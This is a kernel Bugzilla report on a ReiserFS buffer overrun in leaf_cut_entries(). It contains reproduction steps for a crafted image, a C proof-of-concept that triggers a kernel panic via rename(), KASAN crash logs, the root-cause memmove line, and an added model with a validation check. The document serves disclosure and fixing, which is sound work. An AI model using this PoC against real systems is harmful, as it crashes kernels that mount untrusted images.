https://bugzilla.kernel.org/show_bug.cgi?id=200351

            Bug ID: 200351
           Summary: buffer overrun in leaf_cut_entries() when rename() file on a reiserfs filesystem
           Product: File System
           Version: 2.5
    Kernel Version: 4.18
          Hardware: All
                OS: Linux
              Tree: Mainline
            Status: NEW
          Severity: normal
          Priority: P1
         Component: ReiserFS
          Assignee: reiserfs-devel@xxxxxxxxxxxxxxx
          Reporter: wen.xu@xxxxxxxxxx
        Regression: No

Created attachment 277005
  --> https://bugzilla.kernel.org/attachment.cgi?id=277005&action=edit
The (compressed) crafted image which causes crash

- Reproduce (4.18)

# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 33.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Rename foo/bar/baz to foo/baz inside the mounted crafted image; the
 * directory-entry cut performed during the rename hits the bad memmove. */
static void activity(const char *mpoint)
{
	char *foo_bar_baz;
	char *foo_baz;

	if (asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint) < 0 ||
	    asprintf(&foo_baz, "%s/foo/baz", mpoint) < 0)
		exit(EXIT_FAILURE);
	if (rename(foo_bar_baz, foo_baz) < 0)
		perror("rename");
	free(foo_bar_baz);
	free(foo_baz);
}

int main(int argc, char *argv[])
{
	if (argc != 2) {
		fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
		return 1;
	}
	activity(argv[1]);
	return 0;
}

- Kernel message

[ 389.198227] ==================================================================
[ 389.199818] BUG: KASAN: out-of-bounds in leaf_cut_from_buffer+0x2bc/0x790
[ 389.201193] Read of size 18446744073709491481 at addr ffff8801cd7ee89b by task poc/1425
[ 389.202797]
[ 389.203829]
[ 389.204161] The buggy address belongs to the page:
[ 389.205137] page:ffffea000735fb80 count:1 mapcount:1 mapping:ffff8801f0a59b61 index:0x5626422f9
[ 389.206894] flags: 0x2ffff0000040068(uptodate|lru|active|swapbacked)
[ 389.208196] raw: 02ffff0000040068 ffffea000735fb48 ffffea0007340388 ffff8801f0a59b61
[ 389.209762] raw: 00000005626422f9 0000000000000000
0000000100000000 ffff8801dfa3e600
[ 389.211336] page dumped because: kasan: bad access detected
[ 389.212468] page->mem_cgroup:ffff8801dfa3e600
[ 389.213355]
[ 389.213678] Memory state around the buggy address:
[ 389.214651]  ffff8801cd7ee780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 389.216122]  ffff8801cd7ee800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 389.217570] >ffff8801cd7ee880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 389.245114]                    ^
[ 389.245988]  ffff8801cd7ee900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 389.247453]  ffff8801cd7ee980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 389.248901] ==================================================================
[ 389.365425] general protection fault: 0000 [#1] SMP KASAN PTI
[ 389.366633] CPU: 1 PID: 1426 Comm: kworker/u4:1 Tainted: G B 4.18.0-rc1+ #8
[ 389.368332] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 389.370300] RIP: 0010:kmem_cache_alloc+0xa9/0x1e0
[ 389.387832] Call Trace:
[ 389.388393]  ? jbd2_journal_add_journal_head+0x95/0x1d0
[ 389.389467]  jbd2_journal_add_journal_head+0x95/0x1d0
[ 389.390506]  jbd2_journal_get_write_access+0x4f/0x80
[ 389.391553]  __ext4_journal_get_write_access+0x3b/0x80
[ 389.392614]  ext4_reserve_inode_write+0xd9/0x110
[ 389.393566]  ext4_mark_inode_dirty+0xfb/0x3d0
[ 389.394468]  ? ext4_expand_extra_isize+0x2e0/0x2e0
[ 389.395544]  ? kmem_cache_alloc+0x17c/0x1e0
[ 389.396415]  ? __ext4_journal_start_sb+0x89/0x180
[ 389.397424]  ext4_dirty_inode+0x51/0x70
[ 389.398241]  __mark_inode_dirty+0x220/0x4f0
[ 389.399115]  ? timespec64_trunc+0x90/0x90
[ 389.399944]  generic_update_time+0xd7/0x170
[ 389.400807]  touch_atime+0x164/0x190
[ 389.401546]  ? __atime_needs_update+0x360/0x360
[ 389.402493]  generic_file_read_iter+0xe28/0xff0
[ 389.416224]  ? filemap_range_has_page+0x170/0x170
[ 389.417226]  ? aa_path_link+0x200/0x200
[ 389.418029]  ? page_cache_tree_insert+0x1d0/0x1d0
[ 389.418996]  ? ext4_xattr_ibody_get+0x320/0x320
[ 389.419936]  ext4_file_read_iter+0xa0/0x170
[ 389.420807]  __vfs_read+0x283/0x400
[ 389.421537]  ? __x64_sys_copy_file_range+0x380/0x380
[ 389.422562]  ? __fsnotify_inode_delete+0x20/0x20
[ 389.423524]  ? rw_verify_area+0x78/0x140
[ 389.424330]  vfs_read+0xbf/0x1b0
[ 389.425007]  kernel_read+0x6e/0xa0
[ 389.425718]  prepare_binprm+0x1d5/0x390
[ 389.426515]  ? install_exec_creds+0xc0/0xc0
[ 389.427414]  ? _cond_resched+0x1a/0x50
[ 389.428202]  __do_execve_file.isra.34+0x961/0xe50
[ 389.429181]  ? prepare_bprm_creds+0xa0/0xa0
[ 389.430056]  do_execve+0x25/0x30
[ 389.430761]  call_usermodehelper_exec_async+0x25c/0x270
[ 389.431841]  ? umh_complete+0x50/0x50
[ 389.432605]  ret_from_fork+0x35/0x40
[ 389.443311] ---[ end trace 2e85051acb5f6dc1 ]---
[ 389.486493] BUG: unable to handle kernel paging request at ffff8801dd400000
[ 389.490145] PGD a120b067 P4D a120b067 PUD a1212067 PMD 1f1e96063 PTE 80000001dd400061
[ 389.495985] Oops: 0003 [#2] SMP KASAN PTI
[ 389.495993] CPU: 0 PID: 1425 Comm: poc Tainted: G B D 4.18.0-rc1+ #8
[ 389.497284] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 389.499173] RIP: 0010:__memmove+0x5b/0x1a0
[ 389.551123] Call Trace:
[ 389.554026]  ? memmove+0x45/0x50
[ 389.555837]  leaf_cut_from_buffer+0x2bc/0x790
[ 389.557639]  balance_leaf+0x2913/0x4800
[ 389.560711]  ? wake_bit_function+0x90/0x90
[ 389.560719]  ? get_neighbors+0x20e/0x450
[ 389.563319]  ? fix_nodes+0x1ea3/0x35c0
[ 389.564199]  ? replace_key+0xf0/0xf0
[ 389.564205]  do_balance+0x219/0x430
[ 389.564209]  ? do_balance+0x219/0x430
[ 389.564216]  ? get_right_neighbor_position+0x80/0x80
[ 389.565251]  ? create_virtual_node+0x9d0/0x9d0
[ 389.566503]  ? comp_items+0xa0/0xa0
[ 389.567672]  ? __asan_loadN+0xf/0x20
[ 389.569300]  reiserfs_cut_from_item+0x6b7/0xbc0
[ 389.570434]  ? reiserfs_delete_solid_item+0x540/0x540
[ 389.571547]  ? search_by_key+0x1223/0x19d0
[ 389.573010]  ? pathrelse+0x70/0x70
[ 389.574383]  ? current_time+0xb3/0x110
[ 389.575677]  ? kasan_check_write+0x14/0x20
[ 389.576761]  ? __brelse+0x4f/0x60
[ 389.577860]  reiserfs_rename+0xc31/0xfc0
[ 389.579158]  ? reiserfs_create+0x3d0/0x3d0
[ 389.580558]  ? __asan_loadN+0xf/0x20
[ 389.581763]  ? pathrelse+0x70/0x70
[ 389.582843]  ? unwind_get_return_address+0x36/0x50
[ 389.584076]  ? __save_stack_trace+0x92/0x100
[ 389.584084]  ? __asan_loadN+0xf/0x20
[ 389.585293]  ? search_by_entry_key+0x20c/0x4b0
[ 389.586340]  ? __asan_loadN+0xf/0x20
[ 389.587537]  ? lockref_put_or_lock+0x160/0x160
[ 389.588725]  ? kasan_check_write+0x14/0x20
[ 389.589833]  ? blk_mq_debugfs_unregister_sched_hctx+0x50/0x50
[ 389.590901]  ? _cond_resched+0x1a/0x50
[ 389.592252]  vfs_rename+0xa70/0xda0
[ 389.592257]  ? vfs_rename+0xa70/0xda0
[ 389.592262]  ? path_mountpoint+0x940/0x940
[ 389.592269]  ? kasan_check_write+0x14/0x20
[ 389.593883]  ? security_path_rename+0xcb/0x130
[ 389.595185]  do_renameat2+0x7d2/0x860
[ 389.596291]  ? user_path_create+0x40/0x40
[ 389.596297]  ? kasan_check_write+0x14/0x20
[ 389.596303]  ? lockref_put_return+0xd0/0x140
[ 389.596310]  ? lockref_get_or_lock+0x160/0x160
[ 389.597589]  ? kasan_check_read+0x11/0x20
[ 389.598791]  ? mntput_no_expire+0x35/0x280
[ 389.600322]  ? mntput+0x36/0x50
[ 389.600330]  ? __fput+0x293/0x380
[ 389.600349]  ? task_work_run+0x4d/0xf0
[ 389.601482]  ? mem_cgroup_handle_over_high+0x21/0xe0
[ 389.602565]  __x64_sys_rename+0x3b/0x50
[ 389.604169]  do_syscall_64+0x78/0x170
[ 389.604178]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 389.605411] RIP: 0033:0x7fc79dc71367
[ 389.676741] CR2: ffff8801dd400000
[ 389.676747] ---[ end trace 2e85051acb5f6dc2 ]---
[ 389.692065] general protection fault: 0000 [#3] SMP KASAN PTI
[ 389.693357] CPU: 0 PID: 1425 Comm: poc Tainted: G B D 4.18.0-rc1+ #8
[ 389.694164] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 389.694940] RIP: 0010:__x86_indirect_thunk_rdx+0x10/0x20
[ 389.723797] Call Trace:
[ 389.725264]  <IRQ>
[ 389.726102]  ? rcu_process_callbacks+0x2cb/0x850
[ 389.767763]  ? note_gp_changes+0xe0/0xe0
[ 389.768589]  ? run_rebalance_domains+0x11c/0x170
[ 389.769558]  __do_softirq+0x11d/0x341
[ 389.770344]  irq_exit+0xe9/0xf0
[ 389.771015]  smp_apic_timer_interrupt+0x8f/0x1b0
[ 389.771990]  apic_timer_interrupt+0xf/0x20
[ 389.772844]  </IRQ>
[ 389.773302] RIP: 0010:__asan_load4+0x0/0x80
[ 389.786963]  ? rwsem_down_write_failed+0x536/0x650
[ 389.787969]  ? rwsem_down_write_failed+0x549/0x650
[ 389.788964]  ? rwsem_down_read_failed+0x280/0x280
[ 389.789942]  ? unlock_page_memcg+0x16/0x80
[ 389.790811]  ? page_remove_rmap+0x198/0x520
[ 389.791695]  ? mark_page_accessed+0x133/0x200
[ 389.792596]  ? _cond_resched+0x1a/0x50
[ 389.793384]  ? unmap_page_range+0xcd4/0xe50
[ 389.794253]  call_rwsem_down_write_failed+0x17/0x30
[ 389.795267]  ? call_rwsem_down_write_failed+0x17/0x30
[ 389.796315]  ? unlink_file_vma+0x38/0x70
[ 389.797131]  down_write+0x2f/0x50
[ 389.797829]  unlink_file_vma+0x4b/0x70
[ 389.798612]  free_pgtables+0x56/0x1b0
[ 389.799385]  exit_mmap+0x146/0x2a0
[ 389.800097]  ? __ia32_sys_munmap+0x50/0x50
[ 389.800950]  ? kasan_check_read+0x11/0x20
[ 389.801795]  ? mm_update_next_owner+0x322/0x380
[ 389.802737]  mmput+0x8b/0x1d0
[ 389.803427]  do_exit+0x43a/0x1390
[ 389.804126]  ? mntput+0x36/0x50
[ 389.804787]  ? mm_update_next_owner+0x380/0x380
[ 389.805730]  ? task_work_run+0x4d/0xf0
[ 389.806516]  ? mem_cgroup_handle_over_high+0x21/0xe0
[ 389.807548]  ? __x64_sys_rename+0x3b/0x50
[ 389.808380]  rewind_stack_do_exit+0x17/0x20
[ 389.809247] RIP: 0033:0x7fc79dc71367
[ 389.829704] ---[ end trace 2e85051acb5f6dc3 ]---
[ 389.855361] Kernel panic - not syncing: Fatal exception in interrupt
[ 389.930786] Kernel Offset: 0x24000000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
[ 389.932982] ---[ end Kernel panic - not syncing: Fatal exception in interrupt ]---

- Reason

https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/lbalance.c#L1130

	/* shift records, those are BEFORE removed entries */
	memmove(prev_record - cut_records_len - DEH_SIZE * del_count,
		prev_record, item + ih_item_len(ih) - prev_record);

Here the `size` argument of memmove, `item + ih_item_len(ih) - prev_record`, can be negative on the crafted image; converted to size_t it becomes the huge "Read of size 18446744073709491481" in the KASAN report above, which leads to a buffer overrun and the kernel panic afterwards.

Reported by Wen Xu (wen.xu@xxxxxxxxxx) from SSLab at Gatech.
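To make the sign error in the memmove length concrete, here is an added stand-alone model of the arithmetic (written for this report, not kernel code): in my reading of lbalance.c, prev_record is item plus the on-disk deh_location of the entry just before the cut, so a crafted entry head whose location lies past the item end makes the length negative. The dir_item struct, the sample locations and the dir_item_valid() check are constructed for illustration; DEH_SIZE is the 16-byte on-disk entry-head size.

```c
/* Hypothetical model of the leaf_cut_entries() memmove length, plus the
 * consistency check a defender would apply to a directory item before
 * trusting its entry heads. Not the kernel's code. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define DEH_SIZE 16   /* on-disk size of struct reiserfs_de_head */

/* Constructed stand-in for one directory item: entry heads at the start,
 * records packed from the end of the item backwards, each head's location
 * being the record's offset within the item. Only the fields the arithmetic
 * needs are modelled. */
struct dir_item {
    uint16_t item_len;      /* ih_item_len(ih) */
    uint16_t entry_count;   /* ih_entry_count(ih) */
    uint16_t location[4];   /* deh_location of each entry head */
};

/* Sane item: 3 entries, records at [88,100), [70,88), [48,70).
 * crafted != 0 pushes the first head's location past the item end, the
 * kind of inconsistency a fuzzed image can carry. */
static struct dir_item make_item(int crafted)
{
    struct dir_item d = { .item_len = 100, .entry_count = 3,
                          .location = { 88, 70, 48, 0 } };
    if (crafted)
        d.location[0] = 400;
    return d;
}

/* Length handed to the second memmove in leaf_cut_entries():
 *     item + ih_item_len(ih) - prev_record
 * with prev_record = item + (from ? deh_location(deh[from-1]) : item_len).
 * Returned signed so the sign is visible before the size_t conversion. */
static long cut_tail_len(const struct dir_item *d, int from)
{
    long prev_record_off = from ? d->location[from - 1] : d->item_len;
    return (long)d->item_len - prev_record_off;
}

/* Consistency check: every location must lie behind the entry-head array,
 * inside the item, and strictly decrease with the entry index (each record
 * is at least one byte). Returns 0 when consistent, -1 otherwise. */
static int dir_item_valid(const struct dir_item *d)
{
    long heads_end = (long)d->entry_count * DEH_SIZE;
    long prev = d->item_len;

    if (d->entry_count == 0 || heads_end > d->item_len)
        return -1;
    for (int i = 0; i < d->entry_count; i++) {
        long loc = d->location[i];
        if (loc < heads_end || loc >= prev)
            return -1;
        prev = loc;
    }
    return 0;
}

/* Wrappers for the sane (0) or crafted (1) item when entry 1 is cut. */
static int item_valid(int crafted)
{
    struct dir_item d = make_item(crafted);
    return dir_item_valid(&d);
}

static long tail_len(int crafted)
{
    struct dir_item d = make_item(crafted);
    return cut_tail_len(&d, 1);
}

int main(void)
{
    printf("sane:    valid=%d tail_len=%ld\n", item_valid(0), tail_len(0));
    printf("crafted: valid=%d tail_len=%ld -> as size_t %zu\n",
           item_valid(1), tail_len(1), (size_t)tail_len(1));
    return 0;
}
```

The crafted item fails the check and yields a negative tail length that wraps to a near-2^64 size_t, the same shape as the KASAN "Read of size" value in the report.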